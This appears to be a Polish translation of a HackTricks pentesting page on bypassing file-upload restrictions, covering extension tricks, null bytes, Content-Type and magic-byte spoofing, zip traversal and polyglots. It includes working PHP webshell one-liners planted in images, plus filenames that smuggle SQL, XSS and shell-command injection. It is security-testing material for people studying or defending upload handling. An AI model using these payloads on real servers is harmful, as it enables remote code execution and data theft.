File Upload
Last updated
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Jeśli jesteś zainteresowany karierą w hacking i chcesz złamać to, co nie do złamania - zatrudniamy! (wymagana biegła znajomość polskiego w mowie i piśmie).
Inne przydatne rozszerzenia:
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
Pracując w PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws
Jeśli mają zastosowanie, sprawdź poprzednie rozszerzenia. Przetestuj je również używając dużych liter: pHp, .pHP5, .PhAr ...
Sprawdź dodawanie ważnego rozszerzenia przed rozszerzeniem wykonawczym (użyj również poprzednich rozszerzeń):
file.png.php
file.png.Php5
Spróbuj dodać znaki specjalne na końcu. Możesz użyć Burp do bruteforce wszystkich znaków ascii i Unicode. (Zauważ, że możesz również spróbować użyć wcześniej wspomnianych rozszerzeń)
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
Spróbuj obejść zabezpieczenia oszukując parser rozszerzeń po stronie serwera za pomocą technik takich jak podwajanie rozszerzenia lub dodawanie śmieci danych (null bajtów) między rozszerzeniami. Możesz również użyć wcześniejszych rozszerzeń do przygotowania lepszego ładunku.
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
Dodaj kolejną warstwę rozszerzeń do poprzedniego sprawdzenia:
file.png.jpg.php
file.php%00.png%00.jpg
Spróbuj umieścić rozszerzenie exec przed ważnym rozszerzeniem i miej nadzieję, że serwer jest źle skonfigurowany. (przydatne do wykorzystania błędów konfiguracyjnych Apache, gdzie wszystko z rozszerzeniem** .php, ale niekoniecznie kończące się na .php** wykona kod):
ex: file.php.png
Używając NTFS alternate data stream (ADS) w Windows. W tym przypadku, znak dwukropka “:” zostanie wstawiony po zabronionym rozszerzeniu i przed dozwolonym. W rezultacie, na serwerze zostanie utworzony pusty plik z zabronionym rozszerzeniem (np. “file.asax:.jpg”). Plik ten może być później edytowany przy użyciu innych technik, takich jak użycie jego krótkiej nazwy. Wzór “::$data” może być również użyty do tworzenia plików niepustych. Dlatego dodanie znaku kropki po tym wzorze może być również przydatne do obejścia dalszych ograniczeń (np. “file.asp::$data.”)
Spróbuj złamać limity nazw plików. Ważne rozszerzenie zostaje obcięte. A złośliwy PHP zostaje. AAA<--SNIP-->AAA.php
Obejście Content-Type sprawdzając, ustawiając wartość nagłówka Content-Type na: image/png , text/plain , application/octet-stream
Lista słów kluczowych Content-Type: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
Obejście magic number sprawdzając, dodając na początku pliku bajty prawdziwego obrazu (zdezorientuj polecenie file). Lub wprowadź powłokę wewnątrz metadanych:
exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
\
lub możesz również wprowadzić ładunek bezpośrednio w obrazie:
echo '<?php system($_REQUEST['cmd']); ?>' >> img.png
Jeśli kompresja jest dodawana do twojego obrazu, na przykład przy użyciu niektórych standardowych bibliotek PHP, takich jak PHP-GD, wcześniejsze techniki nie będą przydatne. Możesz jednak użyć PLTE chunk techniki zdefiniowanej tutaj do wstawienia tekstu, który przetrwa kompresję.
Strona internetowa może również zmieniać rozmiar obrazu, używając na przykład funkcji PHP-GD imagecopyresized
lub imagecopyresampled
. Możesz jednak użyć IDAT chunk techniki zdefiniowanej tutaj do wstawienia tekstu, który przetrwa kompresję.
Inną techniką do stworzenia ładunku, który przetrwa zmianę rozmiaru obrazu, jest użycie funkcji PHP-GD thumbnailImage
. Możesz jednak użyć tEXt chunk techniki zdefiniowanej tutaj do wstawienia tekstu, który przetrwa kompresję.
Znajdź lukę, aby zmienić nazwę już przesłanego pliku (aby zmienić rozszerzenie).
Znajdź lukę Local File Inclusion, aby wykonać backdoora.
Możliwe ujawnienie informacji:
Prześlij wielokrotnie (i w tym samym czasie) ten sam plik z tą samą nazwą
Prześlij plik z nazwą pliku lub folderu, który już istnieje
Przesyłanie pliku z “.”, “..”, lub “…” jako jego nazwą. Na przykład, w Apache w Windows, jeśli aplikacja zapisuje przesłane pliki w katalogu “/www/uploads/”, nazwa pliku “.” utworzy plik o nazwie “uploads” w katalogu “/www/”.
Prześlij plik, który może być trudno usunąć, taki jak “…:.jpg” w NTFS. (Windows)
Prześlij plik w Windows z nieprawidłowymi znakami takimi jak |<>*?”
w jego nazwie. (Windows)
Prześlij plik w Windows używając zarezerwowanych (zabronionych) nazw takich jak CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, i LPT9.
Spróbuj również przesłać plik wykonywalny (.exe) lub .html (mniej podejrzany), który wykona kod po przypadkowym otwarciu przez ofiarę.
Jeśli próbujesz przesłać pliki do serwera PHP, zobacz sztuczkę .htaccess do wykonania kodu. Jeśli próbujesz przesłać pliki do serwera ASP, zobacz sztuczkę .config do wykonania kodu.
Pliki .phar
są jak .jar
dla javy, ale dla php, i mogą być używane jak plik php (wykonując je za pomocą php lub włączając je do skryptu...)
Rozszerzenie .inc
jest czasami używane dla plików php, które są używane tylko do importowania plików, więc w pewnym momencie ktoś mógł pozwolić na wykonywanie tego rozszerzenia.
Jeśli możesz przesłać plik XML na serwer Jetty, możesz uzyskać RCE, ponieważ nowe *.xml i *.war są automatycznie przetwarzane. Jak wspomniano na poniższym obrazie, prześlij plik XML do $JETTY_BASE/webapps/
i oczekuj powłoki!
Aby szczegółowo zbadać tę lukę, sprawdź oryginalne badania: uWSGI RCE Exploitation.
Luki w zdalnym wykonywaniu poleceń (RCE) mogą być wykorzystywane w serwerach uWSGI, jeśli ma się możliwość modyfikacji pliku konfiguracyjnego .ini
. Pliki konfiguracyjne uWSGI wykorzystują specyficzną składnię do włączania "magicznych" zmiennych, miejsc i operatorów. Szczególnie potężny jest operator '@', używany jako @(filename)
, zaprojektowany do włączania zawartości pliku. Wśród różnych obsługiwanych schematów w uWSGI, schemat "exec" jest szczególnie potężny, pozwalając na odczyt danych z standardowego wyjścia procesu. Ta funkcja może być manipulowana w celach niecnych, takich jak zdalne wykonywanie poleceń lub dowolne zapisywanie/odczytywanie plików, gdy plik konfiguracyjny .ini
jest przetwarzany.
Rozważ następujący przykład szkodliwego pliku uwsgi.ini
, pokazującego różne schematy:
Wykonanie ładunku następuje podczas analizy pliku konfiguracyjnego. Aby konfiguracja mogła zostać aktywowana i przeanalizowana, proces uWSGI musi zostać zrestartowany (potencjalnie po awarii lub z powodu ataku typu Denial of Service) lub plik musi być ustawiony na automatyczne przeładowanie. Funkcja automatycznego przeładowania, jeśli jest włączona, przeładowuje plik w określonych odstępach czasu po wykryciu zmian.
Kluczowe jest zrozumienie luźnej natury analizy pliku konfiguracyjnego uWSGI. W szczególności omawiany ładunek może być wstawiony do pliku binarnego (takiego jak obraz lub PDF), co dodatkowo poszerza zakres potencjalnej eksploatacji.
W niektórych przypadkach możesz zauważyć, że serwer używa wget
do pobierania plików i możesz wskazać URL. W takich przypadkach kod może sprawdzać, czy rozszerzenie pobieranych plików znajduje się na liście dozwolonych, aby upewnić się, że tylko dozwolone pliki będą pobierane. Jednak to sprawdzenie można obejść.
Maksymalna długość nazwy pliku w linux wynosi 255, jednak wget skraca nazwy plików do 236 znaków. Możesz pobrać plik o nazwie "A"*232+".php"+".gif", ta nazwa pliku obejdzie sprawdzenie (ponieważ w tym przykładzie ".gif" jest ważnym rozszerzeniem), ale wget
zmieni nazwę pliku na "A"*232+".php".
Zauważ, że inną opcją, o której możesz myśleć, aby obejść tę kontrolę, jest przekierowanie serwera HTTP do innego pliku, więc początkowy adres URL obejdzie kontrolę, a następnie wget pobierze przekierowany plik z nową nazwą. To nie zadziała chyba że wget jest używany z parametrem --trust-server-names
, ponieważ wget pobierze przekierowaną stronę z nazwą pliku wskazaną w oryginalnym adresie URL.
Upload Bypass to potężne narzędzie zaprojektowane, aby wspierać Pentesterów i Łowców Błędów w testowaniu mechanizmów przesyłania plików. Wykorzystuje różne techniki bug bounty, aby uprościć proces identyfikacji i wykorzystywania luk, zapewniając dokładne oceny aplikacji internetowych.
Ustaw nazwa pliku na ../../../tmp/lol.png
i spróbuj osiągnąć przechodzenie ścieżki
Ustaw nazwa pliku na sleep(10)-- -.jpg
i możesz być w stanie osiągnąć SQL injection
Ustaw nazwa pliku na <svg onload=alert(document.domain)>
, aby osiągnąć XSS
Ustaw nazwa pliku na ; sleep 10;
, aby przetestować niektóre wstrzyknięcia poleceń (więcej sztuczek wstrzyknięcia poleceń tutaj)
JS plik przesyłania + XSS = Wykorzystanie Service Workers
Spróbuj różnych ładunków svg z https://github.com/allanlw/svg-cheatsheet****
Jeśli możesz wskazać serwerowi internetowemu, aby pobrał obraz z URL, możesz spróbować wykorzystać SSRF. Jeśli ten obraz ma być zapisany na jakiejś publicznej stronie, możesz również wskazać URL z https://iplogger.org/invisible/ i ukraść informacje od każdego odwiedzającego.
Specjalnie przygotowane PDF-y do XSS: następująca strona przedstawia, jak wstrzyknąć dane PDF, aby uzyskać wykonanie JS. Jeśli możesz przesyłać PDF-y, możesz przygotować PDF, który wykona dowolny JS zgodnie z podanymi wskazówkami.
Prześlij zawartość [eicar](https://secure.eicar.org/eicar.com.txt), aby sprawdzić, czy serwer ma jakikolwiek antywirus
Sprawdź, czy istnieje jakikolwiek limit rozmiaru podczas przesyłania plików
Oto lista 10 rzeczy, które możesz osiągnąć, przesyłając (z tutaj):
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Przechowywane XSS / SSRF / XXE
GIF: Przechowywane XSS / SSRF
CSV: Wstrzyknięcie CSV
XML: XXE
AVI: LFI / SSRF
HTML / JS : Wstrzyknięcie HTML / XSS / Otwarte przekierowanie
PNG / JPEG: Atak pixel flood (DoS)
ZIP: RCE poprzez LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["
JPG: "\xff\xd8\xff"
Zobacz https://en.wikipedia.org/wiki/List_of_file_signatures dla innych typów plików.
Jeśli możesz przesłać ZIP, który ma być dekompresowany na serwerze, możesz zrobić 2 rzeczy:
Prześlij link zawierający miękkie linki do innych plików, a następnie, uzyskując dostęp do dekompresowanych plików, uzyskasz dostęp do powiązanych plików:
Nieoczekiwane tworzenie plików w katalogach podczas dekompresji jest poważnym problemem. Mimo początkowych założeń, że ta konfiguracja może chronić przed wykonaniem poleceń na poziomie systemu operacyjnego poprzez złośliwe przesyłanie plików, hierarchiczne wsparcie dla kompresji i możliwości przechodzenia przez katalogi formatu archiwum ZIP mogą być wykorzystane. Umożliwia to atakującym obejście ograniczeń i ucieczkę z bezpiecznych katalogów przesyłania, manipulując funkcjonalnością dekompresji docelowej aplikacji.
Zautomatyzowany exploit do tworzenia takich plików jest dostępny na evilarc na GitHubie. Narzędzie można używać w sposób pokazany:
Dodatkowo, sztuczka z symlinkiem z evilarc jest opcją. Jeśli celem jest zaatakowanie pliku takiego jak /flag.txt
, należy utworzyć symlink do tego pliku w swoim systemie. Zapewnia to, że evilarc nie napotka błędów podczas swojej pracy.
Poniżej znajduje się przykład kodu Python używanego do stworzenia złośliwego pliku zip:
Wykorzystywanie kompresji do sprayowania plików
Dalsze szczegóły znajdziesz w oryginalnym poście w: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/
Tworzenie powłoki PHP: Kod PHP jest napisany w celu wykonania poleceń przekazanych przez zmienną $_REQUEST
.
Sprayowanie plików i tworzenie skompresowanego pliku: Tworzone są wiele plików, a następnie składany jest archiwum zip zawierające te pliki.
Modyfikacja za pomocą edytora hex lub vi: Nazwy plików wewnątrz zip są zmieniane za pomocą vi lub edytora hex, zmieniając "xxA" na "../", aby przechodzić między katalogami.
Prześlij tę zawartość z rozszerzeniem obrazu, aby wykorzystać lukę (ImageMagick , 7.0.1-1) (z eksploitu)
Osadzanie powłoki PHP w kawałku IDAT pliku PNG może skutecznie omijać niektóre operacje przetwarzania obrazów. Funkcje imagecopyresized
i imagecopyresampled
z PHP-GD są szczególnie istotne w tym kontekście, ponieważ są powszechnie używane do zmiany rozmiaru i próbkowania obrazów. Zdolność osadzonej powłoki PHP do pozostawania nietkniętą przez te operacje stanowi znaczną zaletę w niektórych przypadkach użycia.
Szczegółowe omówienie tej techniki, w tym jej metodologia i potencjalne zastosowania, znajduje się w następującym artykule: "Kodowanie powłok internetowych w kawałkach PNG IDAT". To źródło oferuje kompleksowe zrozumienie procesu i jego implikacji.
Więcej informacji w: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
Pliki poliglotowe służą jako unikalne narzędzie w cyberbezpieczeństwie, działając jak kameleony, które mogą jednocześnie istnieć w wielu formatach plików. Interesującym przykładem jest GIFAR, hybryda, która działa zarówno jako GIF, jak i archiwum RAR. Takie pliki nie ograniczają się do tej pary; kombinacje takie jak GIF i JS lub PPT i JS są również możliwe.
Podstawowa użyteczność plików poliglotowych polega na ich zdolności do omijania środków bezpieczeństwa, które skanują pliki na podstawie typu. Powszechną praktyką w różnych aplikacjach jest zezwalanie tylko na określone typy plików do przesyłania—takie jak JPEG, GIF lub DOC—aby zminimalizować ryzyko związane z potencjalnie szkodliwymi formatami (np. JS, PHP lub pliki Phar). Jednak plik poliglotowy, dostosowując się do kryteriów strukturalnych wielu typów plików, może dyskretnie omijać te ograniczenia.
Mimo swojej elastyczności, pliki poliglotowe napotykają ograniczenia. Na przykład, podczas gdy plik poliglotowy może jednocześnie zawierać plik PHAR (PHp ARchive) i JPEG, sukces jego przesyłania może zależeć od polityki rozszerzeń plików platformy. Jeśli system jest rygorystyczny w kwestii dozwolonych rozszerzeń, sama strukturalna dualność pliku poliglotowego może nie wystarczyć, aby zapewnić jego przesłanie.
Więcej informacji w: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
If you are interested in hacking career and hack the unhackable - we are hiring! (biegła znajomość polskiego w mowie i piśmie wymagana).
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)